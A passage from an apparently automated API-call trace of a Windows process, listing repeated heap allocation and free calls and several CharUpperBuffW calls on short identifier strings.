(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0220.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0220.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0220.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0220.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0220.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0220.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0220.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0220.159] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0220.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0220.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0220.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0220.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0220.160] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0220.160] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0220.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0220.161] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0220.162] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0220.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0220.163] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7d0 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74118 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0220.163] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0220.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0220.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74118 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0220.165] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab830 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0220.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0220.165] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0220.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0220.167] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0220.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7d0 [0220.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0220.168] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0220.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 